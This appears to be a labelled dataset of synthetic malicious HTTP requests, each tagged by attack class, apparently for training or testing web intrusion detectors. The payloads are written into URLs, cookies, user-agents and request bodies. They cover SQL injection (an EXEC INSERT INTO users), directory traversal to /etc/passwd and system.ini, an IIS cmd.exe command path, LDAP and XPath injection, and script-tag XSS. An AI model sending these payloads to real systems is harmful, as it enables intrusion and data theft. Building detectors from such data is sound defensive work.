GET /haenToraseit0/lJXWVbE-PH/nF7mif2HkiimIesRAog/tl.lyOsdl/esrhd/su4/gncpnateuNgtaydra/luMgyml3Re0NP/e8pe99BKl3BkfWRP4S/oQvc.jsp?qecnzieyn=%3B+++EXEC%28++%27INS%27%2B%27ERT+++INTO++users+values%281413%2C%27edneOwini%27%2C%27qcewteaRrt%27+%29%29&rearhtpxele=d&eueT=%29b&6ogsemtn=124868503 HTTP/1.1
Host: 169.110.75.111
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.2
Accept-Encoding: identity, identity;q=0.6, gzip, gzip;q=0.2
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 205.53.108.147
Cookie: dnaeqDiQu=cn;h8rr=welsoaheo5cea;7sahmohe=ilp
Cookie2: $Version="9"
Date: Thu, 31 Dec 09 13:53:56 GMT
ETag: W/"NB8ujNmt0uyX._sVfglF"
Expect: 100-continue
From: alubns@ssude.cz
If-Modified-Since: Thu, 30 Apr 09 10:46:23 CET
If-Unmodified-Since: Sat, 06 Sep 08 03:08:14 UTC
If-Match: "xaUZu4e300qoa_gd3qG"
If-None-Match: "t6mszVq2X.btelb"
If-Range: *
Max-Forwards: 3062
MIME-Version: 7.2
Pragma: s2fteeu=orslca
Proxy-Authorization: NTLM eGQwcHVjQ2R0ZXJvMm5tcmhhZWpxbGV0dW5lc1R5TWtuNFJtRW4=
Authorization: cerhke srest=lwcshsc
Range: -521,-331719
Referer: http://zerflnnd.fr/hignttg/lGii9rs/u9nk.cfm
TE: gzip;q=0.5,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.7 (Machintosh; U; PPC 9.1; vI-yf; rv:8.5.7) Gecko/73248196
UA-CPU: PowerPC
UA-Disp: 0650,9249,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 698x973
Via: FTP/6.8 www.Qnreyt.htm, HTTP/2.8 224.17.178.85
Transfer-Encoding: utern
Upgrade: prc/4.5, 2sFe/0.3
Warning: 532 103.218.114.157 "eqF8dbfeC" "Sat, 29 Jan 05 05:14:55 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 8017409
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41865
Start - Id: 46225
class: PathTransversal
GET /3R6FJMpnUjUT/sqqbg8izD2JIW@YhS/apt0V_.oJZVl3vHOpcq/iCaAiiegqetojtbbiEa/cxSjIDyP/slSIlpBIF2Lu.css?tlxahas3t7se=t2GBpND&arse=cjvG&Bcat34S=04768&w1ZC21D=wsodYWsc4c+&0bLNstdind.7=eG3LvR&69@9bvDe=eD&vhavingQ6ynTSsN=%2Fetc%2Fpasswd&eeo=ou%3A+0P HTTP/1.1
Host: www.3hdp.net
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 184.19.40.250
Cookie: urotbmx=th~st;d3NHQ=5302077574;P5vjL=dnsyeaodd8=
Cookie2: $Version="374"
Date: Fri, 04 Mar 05 22:04:59 CET
ETag: W/"T3S71sqPNBzZRCk"
Expect: 100-continue
From: eftra@neleobejy.com
If-Modified-Since: Mon, 24 Jan 05 03:06:21 UTC
If-Unmodified-Since: Sun, 06 May 07 01:41:23 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 11 Jun 07 03:33:11 UTC
Max-Forwards: 733
MIME-Version: 1.9
Pragma: tinn2l=e
Proxy-Authorization: nuit ePlSnli=Ews6alar
Authorization: Basic b2VpbzpIcGhyZQ==
Range: 3-320
Referer: /na2thEt/ohA5ieOe/ekfoe/bsrr.php3
TE: trailers,deflate;q=0.0,deflate
Trailer: Accept-Language
User-Agent: Mozilla/4.7 (Machintosh; U; PPC Mac OS X 6.0; It-ts; rv:1.4.8) Gecko/25322605
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6581x3968
Via: HTTP/6.2 37.139.61.164
Transfer-Encoding: gzip
Upgrade: esjpot/5.8, eni/8.5, tytox8/4.9
Warning: 235 www.tpm0.css "YcngsoigutaasdemifSa" 
X-Forwarded-For: 29.166.94.55
X-Serial-Number: 79986231728889
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46225
Start - Id: 44990
class: PathTransversal
GET /NCZK7Z3NCXnbv/cy--x5sP7jbo9zzaKUb/o9O8l4yV5ia0.Sx.jpeg?trzcmwcrlk=gosmh&qktlxgfr=38&vPxYt8=%5Ba&msetnno=%3Dallg%26i&ywnahert8a=%252e%252e.%5C%25252f%2F%5C%25252f%2F...%5C%25252e..%252e&ooorn=asw&cn=j9o&rilthee1jZs=yesechodinsertDinclude%3BApr&cs=2&g2Gre=7&iJuss=aan35shseltqI HTTP/1.1
Host: www.d6oEPodb2e.fr
Connection: close
Accept: */*
Accept-Charset: iso-8859-6, iso-2022-kr, euc-jp;q=0.0, x-mac-korean
Accept-Encoding: deflate
Accept-Language: *;q=0.1
Cache-Control: sleAOase=eHair
Client-ip: 223.133.197.156
Cookie: ewe=1959782821;4tOieeOBtt8in0e=0Nfd22VDv4-A;sasomi=os2rvow7
Cookie2: $Version="8"
Date: Sun, 05 Jul 09 12:13:15 GMT
ETag: W/"K3wowyZow_Ffh6Twf9et"
Expect: 100-continue
From: d1afcs@ehhqe5r.cz
If-Modified-Since: Wed, 14 Apr 04 20:14:10 GMT
If-Unmodified-Since: Wed, 12 Apr 06 15:04:10 UTC
If-Match: *
If-None-Match: "3MM8ouQr5OiK1-pX"
If-Range: *
Max-Forwards: 224
MIME-Version: 8.3
Pragma: aaeefew='jbwsitm'
Proxy-Authorization: Basic ZW5sdGlvTnU6aDV0cG5l
Authorization: Basic dGJ0ZDplR2ZhaDY=
Range: -724
Referer: http://na9h0n.uk/zptt/54sjm5e.sh
TE: deflate,chunked,trailers
Trailer: Accept-Encoding
User-Agent: sgeelearxl (fSmqNRi4R; ePJ.dRPJFT; 0fSRe1iU7W; o-qcH4KY; plsRT8tAe)
UA-CPU: 68000
UA-Disp: 810,5138,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 298x3014
Via: 0.0 157.187.125.92, 4.8 www.rrtdsmo.js:084, gvou/6.7 64.107.225.99
Transfer-Encoding: deflate
Upgrade: 2sihh/3.3, x4nlo1/8.6, M1u/8.1, escfn/6.3
Warning: 947 104.115.69.47 "thhtcs4" "Tue, 22 Jul 08 21:19:00 GMT"
X-Forwarded-For: 235.153.99.79
X-Serial-Number: 8606404239
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44990
Start - Id: 35541
class: XPathInjection
PUT /euwC--PPNeA/ab/uAfchs86do/tbfwptn7n2ch9/seheofr5lIeu1/Iw-qhP62gY2-7j/itpueV/mAN/EjvNelp/e0HfXq_.mspx? HTTP/1.0
Content-Length: 406
Content-Language: abeavdae
Content-Encoding: compress
Content-Location: /ewhdi/rwoi/ojhmd/rbng.mdb
Content-MD5: MHNldEFlNGJlZWFzYTRhZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 Nov 04 17:50:51 UTC
Last-Modified: Sat, 07 Feb 09 03:32:52 CET
Host: 120.220.4.197
Connection: pnwm
Accept: text/*;q=0.3, image/*;q=0.9
Accept-Charset: iso-8859-1;q=0.8, windows-1253, iso-8859-1, macintosh;q=0.6
Accept-Encoding: deflate, deflate, compress, deflate;q=0.2
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 50.148.205.107
Cookie: 6a0h6eaUtnraei=1168427;lsock_streamYncxvarN=r2
Cookie2: $Version="9"
Date: Sun, 20 Aug 06 14:31:00 GMT
ETag: W/"YthNYXXNEQKeFuBoXKu9"
Expect: w30es
From: Q6fua@alfpse.net
If-Modified-Since: Tue, 28 Jul 09 05:22:13 GMT
If-Unmodified-Since: Tue, 24 Jan 06 01:48:20 CET
If-Match: "QcyQ.HFsiXa.4k-eRUJ"
If-None-Match: "ey4TpTgzmWzSm9l_w"
If-Range: *
Max-Forwards: 6
MIME-Version: 2.5
Pragma: ttmiix=Eou
Proxy-Authorization: NTLM aHJtZTJlYWVzZXIwb2VybGVlb21yOGFuZU5pcnBpam50aQ==
Authorization: Digest algorithm=MD5-sess
Range: 7-26018,971548-,-1
Referer: /rhlin/inlTie1/tjtrAem9.js
TE: trailers,chunked
Trailer: Host
User-Agent: aaEaewidji (oYOvNNCOp; iYJ7Wi; a1yHILUC; aSQJMr5yp; iWzgKPX@e)
UA-CPU: 68000
UA-Disp: 740,794,8
UA-Pixels: 502x021
Via: wwfubf/2.3 225.79.153.111
Transfer-Encoding: compress
Upgrade: rqh/0.3, h5Re/1.2, 2i9ytr/6.7, dnnc/3.7, eie/9.3
Warning: 559 www.obo9.js "F7ceoat8n5sa5ne" "Wed, 18 Nov 09 09:39:58 UTC"
X-Forwarded-For: 73.71.14.52
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

n6oE5tnnLqn=yesw&oHei6=918   or   count(path/child::node()[position()=((i+j+k+l+1)]   |  path/child::*()[position()=(k+1)])=1   or  07876=&6w1wFmPh@=0101840928&os=0&ie1o=iixOree6eutle9t&hmilh4csFPtc=7837&lcpa31dq6trore=72410&t9dlspc=320&jsnz=61&hf3ahdaU=ode53ehp+a[t&nge5f8t=pdP21fK&erthgheuaci2ik=14993467&demneel12=r+8&eL7G=rrnE

End - Id: 35541
Start - Id: 44016
class: OsCommanding
GET /msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: www.aeshnoeh.fr
Connection: keep-alive
Accept: audio/*;q=0.3, text/*;q=0.7
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-stale=953
Client-ip: 78.141.142.69
Cookie: sllodeh7hDsg=t_R-;ereSabreSo4s7NE=nia'Chtpass?ohttps(s;eb1loRurt=g\e;n25grdOorfn=o oo\gg9oIn3alunion;eeO2Wtejs4yOqna=hqR
Cookie2: $Version="287"
Date: Mon, 31 Jul 06 13:24:54 GMT
ETag: "afS5RErKT8MdXnD1pWsB"
Expect: giStcO=hyjghne
From: 44fa@mshrPyo.gov
If-Modified-Since: Tue, 30 Dec 08 21:49:23 UTC
If-Unmodified-Since: Sat, 29 Nov 08 01:35:55 GMT
If-Match: "k3OU0kBy1dz-tyR@"
If-None-Match: "65GUz-dRH2ZQUeIbRsT1"
If-Range: Fri, 31 Aug 07 14:10:23 UTC
Max-Forwards: 16
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic aW9xM2w6MGFleGE=
Authorization: eIss3 k67Iers6=oa8h
Range: 67-764741,470518-20,3-202913
Referer: /NcNGhb/n9cali1t/Hd6odhdX.txt
TE: gzip;q=0.4,chunked;q=0.9,gzip
Trailer: Host
User-Agent: Irrsesnirognisi3Ust
UA-CPU: PowerPC
UA-Disp: 8658,2452,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5667x180
Via: HTTP/0.2 4.200.156.34:8505
Transfer-Encoding: linaj; ynoa=aeIfci
Upgrade: t8se4/9.5
Warning: 912 248.158.243.227:1807 "eareZo" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44016
Start - Id: 37490
class: LdapInjection
GET /huDJ@y/wi@JHjrlng7A-rSZ/Rv.Rk6ubody.php3? HTTP/1.1
Host: 26.5.58.184
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-hebrew
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 220.105.164.31
Cookie: ic=264)(&(objectClass=mir)(|(sn    =   p5)(cn=N    J*));twhereMXwp-P4nb=qz_9tVe
Cookie2: $Version="588"
Date: Tue, 08 Apr 08 09:50:12 CET
ETag: "qWAZKuUD6VPcO2_G"
Expect: 100-continue
From: 73crEnt@8wDsske.gov
If-Unmodified-Since: Sat, 05 Mar 05 19:55:37 UTC
If-Match: *
If-None-Match: *
If-Range: "1_2dpfky5_Z7hL-nj6d"
Max-Forwards: 409
MIME-Version: 3.7
Pragma: t=3hur
Authorization: Basic cmRhbjpTZmRkaG4=
Range: 8-,17-7941
Referer: /odu8enx/eeac/aeei9i/iimCtus5/gttohg0.wmn
User-Agent: aFl7tuUf-L http://www.sorsrsta.be
UA-OS: Linux
Via: HTTP/4.5 192.106.146.76, FTP/2.9 28.156.141.70, HTTP/9.0 154.241.113.59
Transfer-Encoding: compress
Upgrade: tmnsF7/3.6, sme/8.4
Warning: 872 www.iHezee.gif "dmg7ismd" "Thu, 18 May 06 24:03:11 GMT"
X-Serial-Number: 769430776
----: -------------

null

End - Id: 37490
Start - Id: 35078
class: SqlInjection
GET /yAaol/ttrayihiatlay4e/h6fuG3RaEuDZ/wn2D@1oLLGV@kkMuD9/Si0rwnere1pgtlldfS/ufsIjefiosie7nSe/Non8d0ruoeeEgh/Iaor8/4a/Zih3lHschildyfxlinkg.mspx?ane=dt0i+&d8ienh=644239271&ythv0lufroas9=wcmdf HTTP/1.1
Host: 112.207.113.232
Connection: rcthuh
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.9
Accept-Language: jmho-pnae, nocEna-etg;q=0.5, dd-3;q=0.2, tWl-oies, o-3ar;q=0.5
Cache-Control: min-fresh=115
Cookie: y1eiwyqtseaste=odae8essesbodtcn;ona=73;gg=6;ghs6rrTex=fae;nhacKmwnhs=hr9nehaaetaauea;sI=eqdtaA8httpit
Cookie2: $Version="52"
Date: Mon, 28 Aug 06 18:07:35 CET
ETag: "8J.PtOrQ4ynhF_j5"
Expect: 100-continue
From: Icdw@di9ssorE6e.com
If-Modified-Since: Wed, 15 Jul 09 20:08:30 UTC
If-Unmodified-Since: Fri, 16 May 08 01:17:52 GMT
If-Match: "gMqRlCsYvuJTyZrILXG"
If-None-Match: "LgpFe@8qximiuq5"
If-Range: Fri, 11 Apr 08 01:54:24 GMT
Max-Forwards: 9161
Pragma: iqHthsb='rcbiu'
Authorization: Digest algorithm=w5nz
Range: 8-,02-8893
Referer: http://hOhehhm6.com/e0afnee/pnoSrh/itnpui.mpeg
User-Agent: '  OR   'statsinores'   <     'X
UA-CPU: MIPS
UA-Disp: 7830,290,16
UA-OS: Linux
UA-Pixels: 4116x971
Via: HTTP/4.6 47.74.245.129, HTTP/5.8 www.08neRt.gif:189
Transfer-Encoding: compress
X-Serial-Number: 51475
----: -----------------------------------------

null

End - Id: 35078
Start - Id: 38768
class: LdapInjection
GET /H3o0te/.UT/e3NwE/nz2-yz-VSOgaDO88rj/eHXI/eaNai60ihwldI/ijbICEj-iKCrPL@ekGwq/bFNV0ID@/s.Q0nj.Lw3H8PUZK/i6vrolixhwdq1/eqdKi_O1jJgNL7.htm?ihstmIie=nxH8C&EKVzA-execd=%29%28++++%7C%28displayName%3Dhad*%29+++%28name+++%3Dhad*++%29%28+mail%3Dhad*+++%29 HTTP/1.1
Host: www.dahT.org
Connection: close
Accept: audio/basic, application/x-tar;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: ehnt-IrpU7fsi, sih-ssnbNec;q=0.9, vssn4-b6ecte, gtapto-lgec;q=0.0
Cache-Control: no-store
Client-ip: 235.132.234.170
Cookie: GRa=ate16tibiiss;thGsee8a=(esws;inputpSp3=9536869;na=ssd5eaxo;onaCE=divlqaOsock_streamiiM;wexr214af81=lR
Cookie2: $Version="7"
Date: Wed, 02 Jan 08 21:31:28 UTC
ETag: W/"JGyuh3.3J58-vPmC"
Expect: 100-continue
From: pec4ua@ndeAcvp.it
If-Modified-Since: Mon, 20 Mar 06 07:09:09 GMT
If-Unmodified-Since: Fri, 23 Apr 04 05:46:09 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: msqj1 teTt=oUahvo
Authorization: edzh nuUs2osn=ijuohy
Range: 7-
Referer: /luhrR/negus/tcnnto/stnw.gz
TE: trailers,gzip;q=0.1,trailers
Trailer: Accept-Language
User-Agent: egmb1fe/0.9
UA-CPU: Sparc
UA-Disp: 1821,609,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 343x5234
Via: 8.1 www.ddenNs.png, 8.2 49.250.97.224
Transfer-Encoding: 7ledo6; torge2=rhneoOt
Upgrade: Niea/4.1, tgdad/3.0
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 15.223.231.187
X-Serial-Number: 323337935267147
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38768
Start - Id: 35883
class: XPathInjection
GET /aavrooeepr0asoiii/QOOzH7DmmKwhereTP/ien/ascinua9b0lbg7s7rotj/bonmpg.css?dmllnoeTeeLpuns=ntc&Iea1daihivoaaI=atyti9%2Ft9tsT%2Fe4a%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D06%5D++or++%27nsl0pfh%27++++%3D++%27&etrxjrur16nol=%2Bbin%5C%27%3F7 HTTP/1.0
Host: 38.19.240.221
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: windows-1252;q=0.6
Accept-Encoding: deflate, gzip, deflate;q=0.2
Accept-Language: *
Cache-Control: min-fresh=23756
Client-ip: 204.135.13.34
Cookie: l0ysttdtsneOyoe=tquPwP
Cookie2: $Version="462"
Date: Sun, 05 Aug 07 13:48:14 GMT
ETag: "j6_RBDMJQV7b5lSDIfdF"
Expect: 100-continue
From: elnuss@neAdimn.fr
If-Modified-Since: Thu, 18 Dec 08 06:31:56 UTC
If-Unmodified-Since: Mon, 06 Sep 04 17:11:57 GMT
If-Match: *
If-None-Match: "hwzsS1.sHLWWGb4Qyrv6"
If-Range: Thu, 24 Feb 05 15:05:27 CET
Max-Forwards: 153
MIME-Version: 8.2
Pragma: hasrLrae='nr6'
Proxy-Authorization: Digest nonce
Authorization: Digest algorithm=iNhnincr
Range: 3-18807,30473-219,305975-44534
Referer: http://www.Alt3o.fr/uent/ruprlo.swf
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/4.7 (Machintosh; U; PPC 0.1; ra-s2; rv:8.7.2) Gecko/08307085
UA-CPU: x86
UA-Disp: 7612,056,16
UA-OS: Linux
UA-Color: color32
Via: FTP/2.1 www.stwb.css:8, 6.8 96.42.220.153, 5.5 108.14.113.230:3072
Transfer-Encoding: gzip
Upgrade: lcMte/6.9, el3/2.6, eorKne/2.7, ennt/1.8
Warning: 976 www.IFve.html:3865 "sMusnctqhhiy2" "Tue, 15 Dec 09 23:16:42 UTC"
X-Serial-Number: 160475
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35883
Start - Id: 37130
class: LdapInjection
GET /nvcohie4e/rJh5f-bvOg5I/vW/mBaTGp.pH.5-rms/WaginputoptB/xOBWOGa/ntR25himiy/NcnbeBwbotenemneeheI.jpeg?KzHq35=%29++++%28+%7C++%28cn%3D*o+++%27brien*++%29%28mail%3D*o++%27brien*+++%29++&oihaytajtenDAep=aineY+or%2Bi&eptet=+execaas HTTP/1.1
Host: www.exwtt0.st:4375
Connection: iaract
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: nyUl=hnvbpe
Client-ip: 55.97.57.216
Cookie: 3lin5eite=h1Obta;5rcrbl=18724;h2loee2esct=592708;sh4pCZG0I=s5hhGN75
Cookie2: $Version="74"
Date: Tue, 17 Jan 06 07:14:37 UTC
ETag: W/"TzveiS5IzxQFMU_"
Expect: seeuhtcr
From: ke6iat@otEmem.org
If-Modified-Since: Tue, 22 Jul 08 20:27:35 CET
If-Unmodified-Since: Thu, 20 May 04 15:33:20 UTC
If-Match: "s73n6l@MZB6r9fOBG"
If-None-Match: "sW9tBDDa1bTwnwhx"
If-Range: "Ih2PkZJ0miHsL15hnx"
Max-Forwards: 03
MIME-Version: 8.7
Pragma: aefnttep=u
Proxy-Authorization: NTLM d2FvU3JvaXRDZGNlSWhlbk9wRWVjdGJlb2hrcmVjZWQ=
Authorization: vosh sirt=ikhhrtr
Range: -972338,855782-
Referer: /yrscAo/pvVe8/aieq/etTafd.avi
TE: trailers,deflate;q=0.3
Trailer: Accept-Language
User-Agent: Mozilla/7.2 (X11; U; SunOS sun4u 7.2; ut-el; rv:1.6.7) Gecko/81202822
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: 3.5 www.ibmt0eie.tiff
Transfer-Encoding: aHmEh; enii=cWIrnon
Upgrade: tRvc9/2.0
Warning: 290 81.121.41.20 "1erpeehEtorXv" 
X-Forwarded-For: 251.177.162.12
X-Serial-Number: 4738976742686812
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37130
Start - Id: 35972
class: PathTransversal
GET /uenpouoluqaTsoo1ct/tiaxGJ0hW/ebeaaia3h/unmitzrznfhe/a7fldhaH9jt/iQ9WzNT17/sh.css?itetn3hTEllofp=aherr&m5hjdmnmtdt=083486223&iutu=aiaqamna2&ennje9=77084&te=%2B&p8lliAin=cob&RtlvKFgA=ebP&bTh7rr45i6A0=bdelete%267%3Cnetcatoo&eronObpdeq=asqnewthosgDuedgf&ct3nt=3661&sepi2u=anShrbgsoundnetcatnnjRlibl+&between3vVKcWpAGL=irtrejoh&lvedae=eWo&Lo6inhibes=osckoeha&uy=04 HTTP/1.1
Host: 75.176.68.238
Connection: close
Accept: application/zip, application/rtf
Accept-Charset: windows-1253;q=0.8, iso-2022-jp, iso-8859-5
Accept-Encoding: compress;q=0.9, gzip;q=0.5, gzip, compress
Accept-Language: b-72taoa, iD4mslpn-owbAeos;q=0.8, sr2-aNhsUth, Nt-9;q=0.6, gaRch-7
Cache-Control: no-transform
Client-ip: 81.253.88.247
Cookie: TpKkTV.=95077;nkvneletsfrAvn=58920;2v9nstE=9;ei8EinR=..\..\..\..\..\..\..\..\..\WINDOWS\system.ini
Cookie2: $Version="90"
Date: Sun, 07 Oct 07 07:10:55 UTC
ETag: "IIRgh_EUi@CN_xZxA."
Expect: 100-continue
From: 5rseieyn@tter6Ecal.org
If-Modified-Since: Fri, 20 Aug 04 23:41:47 UTC
If-Unmodified-Since: Sat, 24 Dec 05 09:51:08 UTC
If-None-Match: "2UZMIkqmMA6f5qd3"
If-Range: Mon, 27 Apr 09 08:00:52 GMT
Max-Forwards: 7064
MIME-Version: 6.8
Pragma: treg=ln
Authorization: Basic cGd0MmVnOmFtYmM=
Range: 61-,-511104
Referer: /bhiodgs/bwhsohdn/Q7ota0eg.js
TE: chunked
Trailer: If-Match
User-Agent: Mozilla/2.5 (Windows; U; WinNT 7.7; od-et; rv:5.1.1) Gecko/14988289
UA-CPU: Sparc
UA-OS: Linux
Via: FTP/6.8 www.7orr.js
Upgrade: poqe/7.6, hnxe/9.8, risei/3.6, 6ehtt/3.2
Warning: 749 www.uineg7.png "lrbd6rasitteyhee7" 
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35972
Start - Id: 44681
class: PathTransversal
PUT /trtersnecalnwX7sM/oipMkvNauuTzGhE/h5nEcEnn7uiMX3/iSBs_9F5qHCnZVHNMwr/gtnh2.jpg? HTTP/1.1
Content-Length: 145
Content-Language: yuxo02
Content-Encoding: deflate
Content-Location: /wumtje.asmx
Content-MD5: a29veWNveVJ1c1JzbmVhbg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 07 Apr 10 17:19:54 UTC
Last-Modified: Sat, 03 Sep 05 22:50:28 CET
Host: 124.22.236.37:24
Connection: Eeiinyz
Accept: image/gif, application/zip;q=0.5, audio/*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 153.69.134.128
Cookie: bmglfmUhnlI=erDD3;hitcsAwRhye=Dtn4j fg;wzisati73p4gsr=38231755
Cookie2: $Version="2"
Date: Sat, 09 Jan 10 07:47:10 GMT
From: EeA0y@doscaiun.org
If-Modified-Since: Sun, 06 Aug 06 14:31:45 CET
If-Unmodified-Since: Thu, 30 Oct 08 20:29:23 GMT
If-None-Match: "T5kW99spjULW0Em0eCV"
If-Range: Tue, 26 Jul 05 17:25:40 UTC
Max-Forwards: 80
Pragma: no-cache
Authorization: Digest cnonce="2rtnhor"
Referer: http://www.cueoi.ch/iaix/tynT/rtcbnT/radxh/ismt.gif
User-Agent: Mozilla/7.3 (compatible; Konqueror/0.0; SunOS sun4u; 8ae3)
UA-OS: Windows 95
UA-Color: color8
Via: iabtc/5.8 www.Fot7pteu.js, FTP/2.4 www.eahe4.css:373
Transfer-Encoding: gzip
Upgrade: oiyo/1.5, mit/5.9, s9pe8/2.2, 5em/1.4, NEBh/0.1
Warning: 690 www.maefe.png:3036 "oEisin22ih1tenabt" 
X-Forwarded-For: 121.97.240.234
----: -----------------

TeOJieds=collection(     file:///c:/fu5/yrar.xml   )&of=|vC6libn%oceisandihomeoSupdate&yeu=t]as7va7aeea&nfolnnanee=070747

End - Id: 44681
Start - Id: 46557
class: XSS
GET /<script>alert('Vulnerable')</script>.shtml? HTTP/1.0
Host: www.eaSyoe.com
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: *
Accept-Encoding: deflate;q=0.3, identity, identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 142.228.77.57
Cookie: lsdBHIvY49n.=7Z.H;Ux1evalT8=u/;Ise=0c7;rot=+h6;anela=ostyle/ suinsert6execenbat;ew=e@aL\ts80d4dii0e
Cookie2: $Version="6"
Date: Thu, 17 Aug 06 10:24:08 GMT
ETag: "pxEyZUXsotp0fFplc7L_"
Expect: 100-continue
From: ns7rogjc@npah.it
If-Modified-Since: Fri, 12 Jan 07 13:38:02 GMT
If-Unmodified-Since: Wed, 14 Apr 04 05:16:37 GMT
If-Match: *
If-None-Match: "19cs3UqJoPiH66B"
If-Range: Sun, 17 Jan 10 19:10:09 UTC
Max-Forwards: 43
MIME-Version: 4.8
Pragma: oiiOYMe=STne
Proxy-Authorization: Digest username="rgww0see"
Authorization: Basic bGEydG9TNHQ6c2VuaWls
Range: -675973,735393-84650,-104881
Referer: http://ivi3Et.ch/obsR/3hs2n/efecnar/3goei.js
TE: deflate,deflate,gzip;q=0.9
Trailer: Pragma
User-Agent: TBrfetsn7
UA-CPU: x86
UA-Disp: 884,253,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 139x000
Via: HTTP/4.5 62.178.108.127:187, dm7uta/6.7 www.egish.js
Transfer-Encoding: sihz
Upgrade: irra/6.5, aec/6.4, reai65/1.7, rTN/8.4, fctm/6.2
Warning: 953 162.158.190.142 "tshTYs" 
X-Forwarded-For: 45.4.150.153
X-Serial-Number: 794611052
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46557
Start - Id: 38801
class: LdapInjection
GET /yhootfnralaooh/hlerA9ksrNitdsdy/nhaEnndRtSngdiz/iK26VTE5uPCiW/iuOk.dlgllXmFIn.png?y2tmpJblikew=0rH%5Censgu&2bAWbFG=exGJ&cscrhmg=HDfsglTs&tnauseeezmtatf=nboot.init1&taalEkdtiehd=iTX-&rastotT=ruib9laa6%3Cfrom&ktCoptx=98884117&6Oeto1=yt%29%28++%7C++++%280w%3D*%29&R3xr9sa5=twtnRraclnxkR8&em8sihn=0113705&uQi@OGZP=81250&XAid7ErmTT=w%28eb7grnen&IEHlan=ote0oHtqesfsm5af HTTP/1.1
Host: 35.0.122.1
Connection: close
Accept: application/*, text/*;q=0.3, image/jpeg;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 103.147.207.153
Cookie: sdiarlygarophic=NeT;hOg2ceo4f=anm2oio;otIb5mtu= dbgsoundft;tm3dscc=i6tm3sxo;ata=qs
Cookie2: $Version="055"
Date: Tue, 09 Nov 04 17:29:48 CET
ETag: "954BYt15GW0-QKluibg"
Expect: 100-continue
From: yRoml@orAqOa.ch
If-Modified-Since: Thu, 05 Mar 09 15:42:16 GMT
If-Unmodified-Since: Thu, 11 Mar 04 20:22:53 GMT
If-Match: "ZzBZb2KUg_iTlkV@"
If-None-Match: "96hepxWdtqgSOw8Agg"
If-Range: *
Max-Forwards: 8
MIME-Version: 3.1
Pragma: iuoP8ew='hngitLS'
Proxy-Authorization: NTLM RW1rbmlpc2hoaTFzOUlldHNFZmF4c25ob3RlNm9qbHNjcG43ZQ==
Authorization: Basic b29UcnQ6cG1jdA==
Range: 89831-,-364983
Referer: http://www.s5nv.biz/ndontlH/nhiet.mspx
TE: chunked;q=0.5,chunked;q=0.0,gzip
Trailer: Accept-Language
User-Agent: Mozilla/5.8 (Machintosh; U; PPC 9.4; im-Lr; rv:4.8.3) Gecko/29394349
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8161x590
Via: ezoBi/6.6 166.199.71.86
Transfer-Encoding: deflate
Upgrade: oorig/6.0, osraet/4.0
Warning: 492 17.108.254.89 "nam6dyTtRno" 
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38801
